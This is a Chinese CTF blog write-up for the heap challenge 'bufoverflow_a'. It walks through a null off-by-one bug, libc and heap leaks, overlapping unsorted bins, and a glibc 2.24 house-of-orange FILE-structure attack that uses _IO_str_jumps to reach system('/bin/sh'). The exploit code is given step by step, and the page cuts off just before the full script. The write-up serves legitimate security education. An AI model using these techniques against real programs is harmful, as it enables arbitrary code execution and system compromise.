<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"github.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.json"};
  </script>

  <meta name="description" content="首先，我们检查一下程序的保护机制   然后，我们用IDA分析一下，是一个经典的增删改查的程序，然后我们看到创建堆时，[前两个堆是用malloc创建，后面的堆用calloc创建]{.mark}，这意味着，如果要泄露libc地址，只能靠前两个堆，后面的堆从bin里取出后会清空里面的信息。">
<meta property="og:type" content="article">
<meta property="og:title" content="bufoverflow_a">
<meta property="og:url" content="https://github.com/2020/02/19/bufoverflow_a/index.html">
<meta property="og:site_name" content="ha1vk&#39;s blog">
<meta property="og:description" content="首先，我们检查一下程序的保护机制   然后，我们用IDA分析一下，是一个经典的增删改查的程序，然后我们看到创建堆时，[前两个堆是用malloc创建，后面的堆用calloc创建]{.mark}，这意味着，如果要泄露libc地址，只能靠前两个堆，后面的堆从bin里取出后会清空里面的信息。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://github.com/2020/02/19/bufoverflow_a/image1.JPG">
<meta property="og:image" content="https://github.com/2020/02/19/bufoverflow_a/image2.JPG">
<meta property="og:image" content="https://github.com/2020/02/19/bufoverflow_a/image3.JPG">
<meta property="og:image" content="https://github.com/2020/02/19/bufoverflow_a/image4.JPG">
<meta property="og:image" content="https://github.com/2020/02/19/bufoverflow_a/image5.JPG">
<meta property="og:image" content="https://github.com/2020/02/19/bufoverflow_a/image6.JPG">
<meta property="og:image" content="https://github.com/2020/02/19/bufoverflow_a/1.png">
<meta property="og:image" content="https://github.com/2020/02/19/bufoverflow_a/2.png">
<meta property="og:image" content="https://github.com/2020/02/19/bufoverflow_a/3.png">
<meta property="og:image" content="https://github.com/2020/02/19/bufoverflow_a/4.png">
<meta property="og:image" content="https://github.com/2020/02/19/bufoverflow_a/5.png">
<meta property="og:image" content="https://github.com/2020/02/19/bufoverflow_a/6.png">
<meta property="og:image" content="https://github.com/2020/02/19/bufoverflow_a/7.png">
<meta property="og:image" content="https://github.com/2020/02/19/bufoverflow_a/image7.JPG">
<meta property="og:image" content="https://github.com/2020/02/19/bufoverflow_a/image8.JPG">
<meta property="article:published_time" content="2020-02-19T04:37:50.000Z">
<meta property="article:modified_time" content="2025-06-21T12:47:51.617Z">
<meta property="article:author" content="ha1vk">
<meta property="article:tag" content="unsorted bin">
<meta property="article:tag" content="house of orange">
<meta property="article:tag" content="off by one">
<meta property="article:tag" content="IO FILE">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/2020/02/19/bufoverflow_a/image1.JPG">

<link rel="canonical" href="https://github.com/2020/02/19/bufoverflow_a/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>bufoverflow_a | ha1vk's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">ha1vk's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://github.com/2020/02/19/bufoverflow_a/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="ha1vk">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ha1vk's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          bufoverflow_a
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-02-19 12:37:50" itemprop="dateCreated datePublished" datetime="2020-02-19T12:37:50+08:00">2020-02-19</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>首先，我们检查一下程序的保护机制</p>
<img src="/2020/02/19/bufoverflow_a/image1.JPG" class="">

<p>然后，我们用IDA分析一下，是一个经典的增删改查的程序，然后我们看到创建堆时，<strong>[前两个堆是用malloc创建，后面的堆用calloc创建]{.mark}</strong>，这意味着，如果要泄露libc地址，只能靠前两个堆，后面的堆从bin里取出后会清空里面的信息。</p>
<img src="/2020/02/19/bufoverflow_a/image2.JPG" class="">

<p>Fill功能存在一个**[null off by one漏洞]{.mark}**</p>
<img src="/2020/02/19/bufoverflow_a/image3.JPG" class="">

<p>我们每次只能对最后创建的那个堆进行读写操作</p>
<img src="/2020/02/19/bufoverflow_a/image4.JPG" class="">

<p>并且delete以后，指针将清空，就无法进行读写操作，除非重新创建一个堆。</p>
<img src="/2020/02/19/bufoverflow_a/image5.JPG" class="">

<p>首先是泄露libc地址，这个很容易，创建一个unsorted bin范围的堆，然后**[后面再创建一个堆用来隔离]{.mark}**，释放后再申请回来显示，即可泄露。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#0  </span></span><br><span class="line">create(<span class="number">0x80</span>)  </span><br><span class="line"><span class="comment">#1  </span></span><br><span class="line">create(<span class="number">0x80</span>)  </span><br><span class="line">delete(<span class="number">0</span>)  </span><br><span class="line">delete(<span class="number">1</span>)  </span><br><span class="line"><span class="comment">#0申请回来，此时保留了libc指针  </span></span><br><span class="line">create(<span class="number">0x80</span>)  </span><br><span class="line">show()  </span><br></pre></td></tr></table></figure>

<p>接下来，我们要泄露堆地址，我们创建large bin范围的堆释放后申请一个比它还大的堆，使得它被放入large bin，从而堆上保留了堆指针，再申请回来。但是**[堆地址保存在fd_nextsize处，位于chunk_addr + 0x10处，我们如果直接显示，只能显示出fd的内容]{.mark}<strong>，因为后面有’x00’结束了。并且，我们也不能利用fill来填充到fd_nextsize处，因为</strong>[用fill，内容的最后会添加一个’x00’]{.mark}**</p>
<img src="/2020/02/19/bufoverflow_a/image6.JPG" class="">

<p>这样，我们仍然不能显示出fd_nextsize的内容。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#1  </span></span><br><span class="line">create(<span class="number">0x400</span>) <span class="comment">#large bin范围的堆释放后会有堆地址  </span></span><br><span class="line">create(<span class="number">0x80</span>) <span class="comment">#2  </span></span><br><span class="line"><span class="comment">#将1放入unsorted bin  </span></span><br><span class="line">delete(<span class="number">1</span>)  </span><br><span class="line"><span class="comment">#触发整理unsorted bin，将1放入large bin，从而1里堆有指针  </span></span><br><span class="line">create(<span class="number">0x500</span>) <span class="comment">#1  </span></span><br><span class="line">delete(<span class="number">1</span>)  </span><br></pre></td></tr></table></figure>

<p>目前，堆的布局是这样的</p>
<img src="/2020/02/19/bufoverflow_a/1.png" class="" title="1.png">

<p>在chunk1的数据域+0x10处，有堆指针。我们可以**[先释放chunk2，使得chunk1和2合并到top chunk]{.mark}<strong>，这样，堆布局变成了这样，但是</strong>[里面的信息仍然没有清空。]{.mark}**</p>
<img src="/2020/02/19/bufoverflow_a/2.png" class="" title="2.png">

<p>然后，我们继续释放chunk0，此时堆布局就只剩下一个TOP chunk</p>
<img src="/2020/02/19/bufoverflow_a/3.png" class="" title="3.png">

<p>接下来，<strong>[我们申请一个0xA0大小的堆(数据域大小0x90)。因为bin里面没有合适的chunk，就从TOP chunk里划分]{.mark}</strong>，堆布局变成这样</p>
<img src="/2020/02/19/bufoverflow_a/4.png" class="" title="4.png">

<p>然后，我们继续申请一个堆，大小任意，比如0x90</p>
<p>此时堆布局变成这样</p>
<img src="/2020/02/19/bufoverflow_a/5.png" class="" title="5.png">

<p>由于chunk0大小为0xA0，比原先大了0x10，那么chunk1就会向后偏移0x10，也就是**[原来chunk1的fd_nextsize位置是现在chunk1的fd位置]{.mark}**，这样，我们显示，就能泄露出堆地址了。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#释放堆2,由于堆2下面是top块，堆2上面的堆1也是free状态，那么就和全部合并到top块里，但里面的指针信息仍然有保留。  </span></span><br><span class="line">delete(<span class="number">2</span>)  </span><br><span class="line"><span class="comment">#此时，堆0下面的堆1是top块，释放0后，堆0也合并到了top块里。  </span></span><br><span class="line">delete(<span class="number">0</span>)  </span><br><span class="line"><span class="comment">#所有bin都合并了，只剩下一个top块  </span></span><br><span class="line"><span class="comment">#错位0x10,使得接下来1的fd位置正好有堆指针  </span></span><br><span class="line">create(<span class="number">0x90</span>) <span class="comment">#0  </span></span><br><span class="line">create(<span class="number">0x80</span>) <span class="comment">#1  </span></span><br><span class="line">show()  </span><br><span class="line">sh.recv(<span class="number">1</span>)  </span><br><span class="line">heap_base = u64(sh.recvuntil(<span class="string">&#x27;\n&#x27;</span>,drop = <span class="literal">True</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>)) - <span class="number">0xB0</span>  </span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;heap_base=&#x27;</span>,<span class="built_in">hex</span>(heap_base)  </span><br><span class="line"><span class="comment">#============================================  </span></span><br><span class="line">delete(<span class="number">0</span>)  </span><br><span class="line">delete(<span class="number">1</span>)  </span><br></pre></td></tr></table></figure>

<p>我们泄露完信息后，又重新把0和1给释放了，使得他们重新合并到top chunk里。因为我们不需要再用它们了。<strong>[并且由于只有前两个堆使用malloc分配，后面的用calloc分配，为了后续利用，我们要腾出位置。]{.mark}</strong></p>
<p>接下来，我们就要伪造堆了。我们最终的目的是要构造出这样的堆布局</p>
<img src="/2020/02/19/bufoverflow_a/6.png" class="" title="6.png">

<p>这样，我们就能从unsorted bin1里申请合适的堆，控制unsorted bin2，从而利用house of orange来getshell。</p>
<p>那么，我们就先来伪造chunk</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#0  </span></span><br><span class="line">create(<span class="number">0x208</span>)  </span><br><span class="line">fake_chunk = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span>  </span><br><span class="line">fake_chunk += p64(<span class="number">0</span>) + p64(<span class="number">0x1E1</span>)  </span><br><span class="line"><span class="comment">#让fd=bk=p绕过检查  </span></span><br><span class="line">fake_chunk += p64(heap_base + <span class="number">0x50</span>)*<span class="number">2</span>  </span><br><span class="line">fake_chunk = fake_chunk.ljust(<span class="number">0x200</span>,<span class="string">&#x27;a&#x27;</span>)  </span><br><span class="line">fake_chunk += p64(<span class="number">0x1E0</span>)  </span><br><span class="line">fill(fake_chunk)  </span><br><span class="line"><span class="comment">#1  </span></span><br><span class="line">create(<span class="number">0x80</span>)  </span><br><span class="line"><span class="comment">#2注意，2必须为0xF0，这样实际为0x100，off by null one后大小仍为0x100，与top chunk相邻，才能合并到top chunk  </span></span><br><span class="line"><span class="comment">#因此不能在2末尾伪造fake_chunk  </span></span><br><span class="line">create(<span class="number">0xF0</span>)  </span><br><span class="line">fill(<span class="string">&#x27;b&#x27;</span>*<span class="number">0xF0</span>)  </span><br><span class="line">  </span><br><span class="line">delete(<span class="number">1</span>)  </span><br><span class="line"><span class="comment">#1  </span></span><br><span class="line">create(<span class="number">0x88</span>)  </span><br><span class="line">fill(<span class="string">&#x27;b&#x27;</span>*<span class="number">0x80</span> + p64(<span class="number">0x270</span>))  </span><br><span class="line"><span class="comment">#合并  </span></span><br><span class="line">delete(<span class="number">2</span>)  </span><br></pre></td></tr></table></figure>

<p>需要注意的是，以前，为了绕过glibc中的检查</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (__builtin_expect (FD-&gt;bk != P || BK-&gt;fd != P, <span class="number">0</span>))                    </span><br><span class="line">  malloc_printerr (<span class="string">&quot;corrupted double-linked list&quot;</span>);  </span><br></pre></td></tr></table></figure>
<p>我们这样操作的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">p-&gt;fd = &amp;p-<span class="number">3</span>*<span class="number">4</span>  </span><br><span class="line">p-&gt;bk = &amp;p-<span class="number">2</span>*<span class="number">4</span>  </span><br></pre></td></tr></table></figure>

<p>但是，现在我们没有办法满足这个条件，我们直接这样</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">p-&gt;fd = p  </span><br><span class="line">p-&gt;bk = p  </span><br></pre></td></tr></table></figure>

<p>还有就是，<strong>[我们的chunk2，包括头结构的总大小为0x100，不能再多也不能再少。]{.mark}</strong></p>
<p>因为null off by one，可以将下一个chunk的size低一字节覆盖为0，因此，size必须大于1字节。但是如果size大于0x100，这意味着，覆盖以后，这个chunk变小了，我们还需在这个chunk的末尾伪造一个填充chunk。这样会使得待会利用时,由于有填充chunk把它与top chunk隔离，使得它不与top chunk合并。<strong>[而我们的目的是要把fake_chunk合并到top chunk里，这样我们就能构造出包含的unsorted bin。]{.mark}</strong></p>
<p>经过这样的操作，我们的堆布局变成这样</p>
<img src="/2020/02/19/bufoverflow_a/7.png" class="" title="7.png">

<p>着色区域全都在top chunk里面，现在，我们就可以来构造两个包含的unsorted bin。</p>
<p>我们先来构造0和1构成的unsorted bin，为了能够顺利delete掉0和1，我们需要复原1和2的头结构相关信息。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">####注意</span></span><br><span class="line">create(<span class="number">0x290</span>) <span class="comment">#2</span></span><br><span class="line"><span class="comment">#重新复原1、2堆的头信息  </span></span><br><span class="line">fill(<span class="string">&#x27;a&#x27;</span>*<span class="number">0x1D0</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x91</span>) + <span class="string">&#x27;a&#x27;</span>*<span class="number">0x80</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>) + <span class="string">&#x27;\n&#x27;</span>)  </span><br><span class="line"><span class="comment">#为了delete后我们的内容不被清空或填充，</span></span><br><span class="line"><span class="comment">#我们需要把chunk1也给剔除，这样我们后面申请的时候，才不会被mallocopt设置free后的填充物</span></span><br><span class="line"><span class="comment">#注意顺序！！！</span></span><br><span class="line">delete(<span class="number">1</span>)  </span><br><span class="line">delete(<span class="number">0</span>)  </span><br></pre></td></tr></table></figure>

<p>由于top chunk在fake_chunk处，因此，我们申请时，从top chunk里切割就是从fake_chunk处开始切割。这样，我们就得到了最外层的unsorted bin。</p>
<img src="/2020/02/19/bufoverflow_a/image7.JPG" class="">

<p>然后，我们要开始构造内层的unsorted bin，那么我们需要释放fake_chunk。而fake_chunk此时位于index 2。<strong>[接下来，我们申请堆，肯定会从我们辛苦得到的外层unsorted bin里切割，没关系，待会用完重新释放回去。]{.mark}<strong>在程序中的堆指针数组中下标2的地方保存着fake_chunk的地址，</strong>[我们现在的目的是要成功释放fake_chunk2。但是，fake_chunk前后的chunk头信息已经被打乱，我们不能直接释放。]{.mark}</strong></p>
<p>我们可以从外层unsorted bin里申请一个大点的堆，然后，我们要在这个堆里重新伪造fake_chunk，已经一个填充chunk，由于绕过检查。<strong>[也就是说，我们要在原来的fake_chunk里面末尾腾出一点位置，制造一个填充chunk，就可以绕过检查了。]{.mark}</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#重新从外层的unsorted bin切割一块空间  </span></span><br><span class="line">create(<span class="number">0x290</span>) <span class="comment">#0  </span></span><br><span class="line"><span class="comment">#在fake_chunk里腾出位置伪造填充块，而这个chunk0末尾也要放一个填充块绕过检查  </span></span><br><span class="line"><span class="comment">#也就是总共要伪造三个chunk，总大小要等于这个chunk0的大小，即0x290  </span></span><br><span class="line">fill(<span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x91</span>) + <span class="string">&#x27;a&#x27;</span>*<span class="number">0x80</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x151</span>) + <span class="string">&#x27;\n&#x27;</span>)  </span><br><span class="line">delete(<span class="number">0</span>) <span class="comment">#得到外层unsorted bin  </span></span><br><span class="line">delete(<span class="number">2</span>) <span class="comment">#得到内层unsorted bin  </span></span><br><span class="line">create(<span class="number">0x290</span>)  </span><br><span class="line"><span class="comment">#现在，我们已经可以控制unsorted bin了  </span></span><br></pre></td></tr></table></figure>

<p>这样，我们就控制了内层的unsorted bin。那么我们就可以利用**[house of orange]{.mark}**了。</p>
<p>本题，提供的libc版本是2.24，因此增加了对vtable的检查。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">IO_validate_vtable (<span class="type">const</span> <span class="keyword">struct</span> _IO_jump_t *vtable)  </span><br><span class="line">&#123;  </span><br><span class="line">  <span class="comment">/* Fast path: The vtable pointer is within the __libc_IO_vtables </span></span><br><span class="line"><span class="comment">     section.  */</span>  </span><br><span class="line">  <span class="type">uintptr_t</span> section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;  </span><br><span class="line">  <span class="type">const</span> <span class="type">char</span> *ptr = (<span class="type">const</span> <span class="type">char</span> *) vtable;  </span><br><span class="line">  <span class="type">uintptr_t</span> offset = ptr - __start___libc_IO_vtables;  </span><br><span class="line">  <span class="keyword">if</span> (__glibc_unlikely (offset &gt;= section_length))  </span><br><span class="line">    <span class="comment">/* The vtable pointer is not in the expected section.  Use the </span></span><br><span class="line"><span class="comment">       slow path, which will terminate the process if necessary.  */</span>  </span><br><span class="line">    _IO_vtable_check ();  </span><br><span class="line">  <span class="keyword">return</span> vtable;  </span><br><span class="line">&#125;  </span><br></pre></td></tr></table></figure>

<p>也就是vtable指针必须在__stop___IO_vtables 和 __start___libc_IO_vtables范围之内。因此，我们可以利用__IO_str_jumps来绕过</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&#123;  </span><br><span class="line">  JUMP_INIT_DUMMY,  </span><br><span class="line">  JUMP_INIT(finish, _IO_str_finish),  </span><br><span class="line">  JUMP_INIT(overflow, _IO_str_overflow),  </span><br><span class="line">  JUMP_INIT(underflow, _IO_str_underflow),  </span><br><span class="line">  JUMP_INIT(uflow, _IO_default_uflow),  </span><br><span class="line">  JUMP_INIT(pbackfail, _IO_str_pbackfail),  </span><br><span class="line">  JUMP_INIT(xsputn, _IO_default_xsputn),  </span><br><span class="line">  JUMP_INIT(xsgetn, _IO_default_xsgetn),  </span><br><span class="line">  JUMP_INIT(seekoff, _IO_str_seekoff),  </span><br><span class="line">  JUMP_INIT(seekpos, _IO_default_seekpos),  </span><br><span class="line">  JUMP_INIT(setbuf, _IO_default_setbuf),  </span><br><span class="line">  JUMP_INIT(sync, _IO_default_sync),  </span><br><span class="line">  JUMP_INIT(doallocate, _IO_default_doallocate),  </span><br><span class="line">  JUMP_INIT(read, _IO_default_read),  </span><br><span class="line">  JUMP_INIT(write, _IO_default_write),  </span><br><span class="line">  JUMP_INIT(seek, _IO_default_seek),  </span><br><span class="line">  JUMP_INIT(close, _IO_default_close),  </span><br><span class="line">  JUMP_INIT(stat, _IO_default_stat),  </span><br><span class="line">  JUMP_INIT(showmanyc, _IO_default_showmanyc),  </span><br><span class="line">  JUMP_INIT(imbue, _IO_default_imbue)  </span><br><span class="line">&#125;;  </span><br></pre></td></tr></table></figure>

<p>我们可以利用_IO_str_finish函数里的这个</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">_IO_str_finish (FILE *fp, <span class="type">int</span> dummy)  </span><br><span class="line">&#123;  </span><br><span class="line">  <span class="keyword">if</span> (fp-&gt;_IO_buf_base &amp;&amp; !(fp-&gt;_flags &amp; _IO_USER_BUF))  </span><br><span class="line">    (((_IO_strfile *) fp)-&gt;_s._free_buffer) (fp-&gt;_IO_buf_base);  </span><br><span class="line">  fp-&gt;_IO_buf_base = <span class="literal">NULL</span>;  </span><br><span class="line">  _IO_default_finish (fp, <span class="number">0</span>);  </span><br><span class="line">&#125;  </span><br></pre></td></tr></table></figure>

<p>我们把vtable指向__IO_str_jumps，把fp-&gt;_free_buffer指向system函数，把fp-&gt;_IO_buf_base指向&#x2F;bin&#x2F;sh字符串，再伪造其他字段，绕过检查，这样就能触发调用system(“&#x2F;bin&#x2F;sh”)了。同理_IO_str_overflow类似。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#house of orange in 2.24  </span></span><br><span class="line">fake_file = p64(<span class="number">0</span>) + p64(<span class="number">0x60</span>)  </span><br><span class="line"><span class="comment">#unsorted bin attack，修改_IO_list_all为main_arena+88  </span></span><br><span class="line">fake_file += p64(<span class="number">0</span>) + p64(_IO_list_all_addr-<span class="number">0x10</span>)  </span><br><span class="line"><span class="comment">#_IO_write_base &lt; _IO_write_ptr  </span></span><br><span class="line">fake_file += p64(<span class="number">0</span>) + p64(<span class="number">1</span>)  </span><br><span class="line"><span class="comment">#_IO_write_end 、IO_buf_base  </span></span><br><span class="line">fake_file += p64(<span class="number">0</span>) + p64(binsh_addr)  </span><br><span class="line">fake_file = fake_file.ljust(<span class="number">0xD8</span>,<span class="string">&#x27;\x00&#x27;</span>)  </span><br><span class="line"><span class="comment">#vtable指针,同时，也作为fake_vtable的__dummy  </span></span><br><span class="line">fake_file += p64(_IO_str_jumps_addr - <span class="number">8</span>)  </span><br><span class="line"><span class="comment">#__dummy2、__finish  </span></span><br><span class="line">fake_file += p64(<span class="number">0</span>) + p64(system_addr)  </span><br></pre></td></tr></table></figure>

<img src="/2020/02/19/bufoverflow_a/image8.JPG" class="">

<p>如果没有getshell，是由于栈环境问题，多试几次就行了。</p>
<p>综上，我们的exp脚本</p>
